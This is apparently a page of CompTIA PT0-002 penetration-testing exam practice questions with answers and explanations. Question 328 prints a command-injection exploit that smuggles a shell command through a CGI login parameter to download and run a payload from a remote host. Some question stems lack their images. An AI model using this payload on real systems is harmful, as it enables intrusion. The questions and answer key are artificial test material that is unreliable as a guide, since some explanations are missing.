CompTIA PT0-002 Online Practice Questions and Exam Preparation

CompTIA PT0-002 Online Questions & Answers

• Question 321:

  After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:

  

  The tester then runs the following command from the previous exploited system, which fails: Which of the following explains the reason why the command failed?

  A. The tester input the incorrect IP address.
  B. The command requires the -port 135 option.
  C. An account for RDP does not exist on the server.
  D. PowerShell requires administrative privilege.
  C. An account for RDP does not exist on the server.

  ---

  Explanation

• Question 322:

  A penetration tester writes the following script:

  

  Which of the following objectives is the tester attempting to achieve?

  A. Determine active hosts on the network.
  B. Set the TTL of ping packets for stealth.
  C. Fill the ARP table of the networked devices.
  D. Scan the system on the most used ports.
  A. Determine active hosts on the network.

  ---

  Explanation

  The tester is attempting to determine active hosts on the network by writing a script that pings a range of IP addresses. Ping is a network utility that sends ICMP echo request packets to a host and waits for ICMP echo reply packets. Ping can be used to test whether a host is reachable or not by measuring its response time. The script uses a for loop to iterate over a range of IP addresses from 192.168.1.1 to 192.168.1.254 and pings each one using the ping command with -c 1 option, which specifies one packet per address.

• Question 323:

  Appending string values onto another string is called:

  A. compilation
  B. connection
  C. concatenation
  D. conjunction
  C. concatenation

  ---

  Explanation

  Concatenation is the term used to describe the process of appending string values onto another string. In Python, concatenation can be done using the + operator, such as "Hello" + "World" = "HelloWorld"4.

  https://docs.microsoft.com/en-us/dotnet/csharp/how-to/concatenate-multiple- strings

• Question 324:

  An Nmap scan of a network switch reveals the following:

  

  Which of the following technical controls will most likely be the FIRST recommendation for this device?

  A. Encrypted passwords
  B. System-hardening techniques
  C. Multifactor authentication
  D. Network segmentation
  B. System-hardening techniques

  ---

  Explanation

• Question 325:

  A penetration tester is taking screen captures of hashes obtained from a domain controller.

  Which of the following best explains why the penetration tester should immediately obscure portions of the images before saving?

  A. To maintain confidentiality of data/information
  B. To avoid disclosure of how the hashes were obtained
  C. To make the hashes appear shorter and easier to crack
  D. To prevent analysis based on the type of hash
  A. To maintain confidentiality of data/information

  ---

  Explanation

  When a penetration tester captures screen images that include hashes from a domain controller, obscuring parts of these images before saving is crucial to maintain the confidentiality of sensitive data. Hashes can be considered sensitive information as they represent a form of digital identity for users within an organization. Revealing these hashes in full could lead to unauthorized access if the hashes were to be cracked or otherwise misused by malicious actors. By partially obscuring the images, the penetration tester ensures that the data remains confidential and reduces the risk of compromising user accounts and the integrity of the organization's security posture.

• Question 326:

  A penetration tester captured the following traffic during a web-application test:

  

  Which of the following methods should the tester use to visualize the authorization information being transmitted?

  A. Decode the authorization header using UTF-8.
  B. Decrypt the authorization header using bcrypt.
  C. Decode the authorization header using Base64.
  D. Decrypt the authorization header using AES.
  C. Decode the authorization header using Base64.

  ---

  Explanation

• Question 327:

  Which of the following situations would require a penetration tester to notify the emergency contact for the engagement?

  A. The team exploits a critical server within the organization.
  B. The team exfiltrates PII or credit card data from the organization.
  C. The team loses access to the network remotely.
  D. The team discovers another actor on a system on the network.
  D. The team discovers another actor on a system on the network.

  ---

  Explanation

• Question 328:

  A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:

  exploit = "POST "

  exploit += "/cgi-bin/index.cgi?action=loginandPath=%27%0A/bin/sh${IFS} ?

  c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache'%0A%27andloginUser=aandPwd=a"

  exploit += "HTTP/1.1"

  Which of the following commands should the penetration tester run post-engagement?

  A. grep -v apache ~/.bash_history > ~/.bash_history
  B. rm -rf /tmp/apache
  C. chmod 600 /tmp/apache
  D. taskkill /IM "apache" /F
  B. rm -rf /tmp/apache

  ---

  Explanation

  The exploit code is a command injection attack that uses a vulnerable CGI script to execute arbitrary commands on the target system. The commands are: cd /tmp: change the current directory to /tmp wget http://10.10.0.1/apache: download a file named apache from http://10.10.0.1 chmod 777 apache: change the permissions of the file to allow read, write, and execute for everyone ./apache: run the file as an executable The file apache is most likely a malicious payload that gives the attacker remote access to the system or performs some other malicious action. Therefore, the penetration tester should run the command rm -rf /tmp/apache post-engagement to remove the file and its traces from the system. The other commands are not effective or relevant for this purpose.

• Question 329:

  A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place?

  A. Maximizing the likelihood of finding vulnerabilities
  B. Reprioritizing the goals/objectives
  C. Eliminating the potential for false positives
  D. Reducing the risk to the client environment
  B. Reprioritizing the goals/objectives

  ---

  Explanation

  Goal Reprioritization Have the goals of the assessment changed? Has any new information been found that might affect the goal or desired end state? I would also agree with A, because by goal reprioritization you are more likely to find vulnerabilities in this specific segment of critical network, but it is a side effect of goal reprioritization.

• Question 330:

  An organization's Chief Information Security Officer debates the validity of a critical finding from a penetration assessment that was completed six months ago.

  Which of the following post-report delivery activities would have most likely prevented this scenario?

  A. Client acceptance
  B. Data destruction process
  C. Attestation of findings
  D. Lessons learned
  A. Client acceptance

  ---

  Explanation

  Client acceptance (A) is a critical post-report delivery activity that involves the client formally accepting the findings and conclusions of a penetration assessment report. This process usually includes a review of the findings by the client,

  discussions about the impact, and agreement on the accuracy and relevance of the reported vulnerabilities and issues. Ensuring client acceptance soon after the delivery of the report can prevent scenarios where the validity of findings is

  debated long after the assessment, as in the case described.

  Data destruction process (B), attestation of findings (C), and lessons learned (D) are also important aspects of a penetration testing engagement, but they do not directly address the issue of the client disputing the findings well after the report

  has been delivered. Client acceptance ensures both parties are in agreement on the outcomes of the assessment, minimizing disputes about the findings later on.